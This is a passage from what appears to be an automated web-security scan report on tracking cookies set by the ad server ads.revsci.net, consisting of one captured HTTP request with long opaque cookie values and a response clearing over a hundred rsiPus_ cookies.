Domain=.revsci.net; Max-Age=1009152000; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1006093-1086373-1264419-1086372-1086371-1086370-1086369-1347038-1086733-1404407-317325-75921-1061877 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlJtLYIXF5A2b72vfsI5majxIQq1FNPs3tLs01SBJaaPUzsK/FDxqSYmPYVuquFO/SkW6+13sxsgQpcph2m+fNr7WmfBVr4UDtrpA6HAl9Quf4KbetQtZmgoUly6wQ7sd+KSCvcGhz3F7fYu+DFw; rtc_96sc=MLuBu6yht4kWQAcYCwq3qtH/Je30l0vQIMllZLMTR5d1cXDbc3eX0XFkPieoml1m03ilSbH+UDzM8ahhkwNRJIjsQekY9SHhEfoErML/TD+1N5BDdk6/B/CvX3bhGLQ3s1uvTJFu6bmlGXFRddc7Q88DyqOsfDVBczaNqEk18Dy7B57guB8dm9vx5I0cfvoTdC2UdNz5S6FBXbz04N3YbbmMXAQ6Wt+0OLHhHUU7KFucwXqAEdNCXxVHVGOHllgcS6HqmtQ1oHhumx0AWg==; udm_0=MLv38CMpYS5rpr4czGDsuuqBPWf7KsMz01fKtT610i1pdlCheRf6b9kCVd3v9r3st7cmM0gIRSd7MpaC8NXsZUwtae0IloLFJap/gZi76IGx+cyWgZ6+vZaNGDMnSvgxwwhKNMJOy6lD9QmxLmp5iUQx8Af2+nfHWRw3Tj+fEjeIT1gLVR4j9TpLtxLXx2KLFlkUS2oKqH7ZtWjiRcE89QZ6mDaSm3BdIs7JxqL4J1x1tvBVvnDY7X40IzE2MKgmkLUHZTKwvj5hcWXCYa8pT1xp1DSpkY7CKKmpKlZtSUGfCVTG17N0zTfBLnW6UzMK8Bk6MPI6U8mgMhL95YKdi9yTeJBsRuAlTc/5no/9OF2E1L1sK1fBlux5bis8Nfd68xeTjr/YrzZkSITtmhZcZTrCNMbqKvmHAl1zL0HcIWPYj4HUgtYCzQxBIcl1C+YNyjTcxwRSsPWSCGeeLiADblyxYX895xGaqMMnUz9A8aKCiYIrasqB5hZsEOOBN7qCBIM/ZuyWnsX9TJhRbKUT9pyWYSVlSgGjm812lLduhcCgqtQCBUaCKQStvRjyoEWxqBf43bWAGEcjB2I29FHX46LC3nvj3+dyvlUL3+cRf2Iz97EyGefayWmbEtWoPl8J+oNA7FQfw0/UyOJf0HeKqhQonhcTgoCjrIni/zz6qEMlbyAqQuvk/IcxeDzUj+6d0ebI81e3TsEXs765NURRog8Fct/gRayZz+RnKF+AbF6ZLn4sa0KYqcY+t6xXsxxULAj1hsqmAsSo7K0BzEGzafTMub7EjOe5zRiXelJiWvjCvbJTOyYp4Oxc3A+SpOIqlGa/Unt6ZH5WOhmdktwqaC3rB5O9Oi82i5FALQR+NfEWeQNPbA==; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; rsiPus_LVUM="MLtXrENrsF9nIAE6VbsxTYfBrZ+7yXZlgVXaxFRzRrgsYcYNfmdo4272ogCIBDOimYv4fEg9zw6j4jrFvDEmjHCoJT8voGTLmJnWzvbs49kTDrTctUCdQ99o84r443+VA4/6HCW3/BRNAYl5aPcaD1s59ilv5lMNITjZH4Wthbsni1n3csqYpkQ4kjzeD9Ag7v0g8pQ43kHlf0zkVU4="; rsi_us_1000000="pUMd5c2g/xMQ7V5vYJPD0C371ly7qzCPyctfVMmoNfzhcSKV0v4e66ymwRf8QcU3FV+IGpm+3PedGzrOT9lT9EoUsFckBCjXgdMoWcJ+ZBwmTcmvYnaIAWGslXxRlOjyV0yAeH49RvV5wpBw+PAcIGEfuZuc4tqocczTORX1uqAjdGan1Zaz6sFHSHyFpNOFKP4PyXx28q95yfVkwA6b4qOX7Qc/kZO/twa3DHKJn5CXUk3ImbspngbAOY9OdE7rAkDDg5t1zwRApTn5BfEfw18PzHYXKtffbkxgQ0XCDWeN8jEgjJJzuv9+0n+IYqBjcIzZfohkqL9IJ8uYTYwtcmjZ+TxfgB7M4ZuMzhISw1WRpG2pk+vmwGRBalwrga+00ZPwjENAkddASB+BhUm04whwG893vWsR1EW2L7I5jNtUceNsv45LeKWq7ai/w/VEhZdtmHFBUtIprPiiLHiGV/zN2GoM2NFYcX+rvNVUAvwn9Myf9l5i3NSWCOLLAtUiglf9v3Vjb2IND7oIUGeYEBRF5SNUykPWjx86I+sRb2eVcjbmdzKfvPLHUwbMmTrpBft+K/R9YYwbnJeFrG9sMBOtPPcbM/kOqkWCZYdHTpMq5r0zjIc9/Ww6wp88lWDwK9Ig9wHsesg09/38LCdrLOpYfvQtW/b9cJ+KTbvbPE+upEdF+jnq8pFghFI13g2TX8KOxFCmrDyPP+K+WKhMydhjMeUBltkClF9H3/lk9/yMn+vX0MN0jgjYIA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LVUM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gdim=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LRgg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-Jfi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bTBF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bEm6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VfeO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YqeU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Dgt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PHh7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R5ta=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sB-Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LIlC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rEo0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ig3D=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5dcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dZVt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nZdO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jrA8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-EDR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LfdY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_w3Ik=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2hxF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_s6i9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qpw9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9q7G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X_m0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-vTc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Dp_w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zi3a=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EVuz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hG-O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3uh_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ed-o=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DgP-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IyHz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9wJ3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3AjH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OeQh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJJI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IKnw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FRRz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Z-ZL=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BlDK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Uce7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hYlJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tvYV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_N2Wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Xwgv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NpBx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7yN0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ytn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R0nn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jHB4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Tbod=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dJ-5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tZle=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tAk2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2wEa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GcnD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dTlc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RcWU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mv19=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nBsJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cIpx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qQG7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TK1Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ebC_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0lxQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_W97N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-cAf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fEAy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DcHG=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-kXI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mvhC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jgOQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sECh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BUMx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_aOWp=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nXqC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DJxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_m2_A=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_M0jo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_I-qW=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_PC0B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OcGH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lpX7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_x85Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Y4G3=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DxQf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WxUe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qxKk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DMxV=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_irVm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9NFF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lc2G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Vs1Y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zrkg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BAU5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6_lC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nHxo=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_R12Q=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AFG2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DAxJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_OiN2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_22wc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9z65=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cWvO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6AGk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X5fA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xCLB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VeZQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GdYU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Nuyz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9LuU=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8hPO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__hgI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zCmS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zB78=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3cxz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_0Svs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tIki=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VmnB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VnuE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jU0b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FnTH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8VJk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_gN5g=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NGZ6=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ykIF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lvxT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru6l=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_fsx9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mjM4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TAJT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_K27G=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_cj=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-r_t=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_c9Qy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_okZc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_f9hD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_piZk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_amP2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jzux=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_S261=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_U-lS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GRM2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ru44=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_05qP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_WUD5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_37Ra=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pdjm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wQ9i=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TgmM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_F1aA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtKf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qaRA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxPB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_AOct=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Hvpv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_umeK=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Bqao=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zXe7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mcS7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_nSV0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dXYl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_r5h4=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_YGYS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uOdh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t8un=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_UhXN=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Yggs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tFKi=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_dMCl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jUrT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
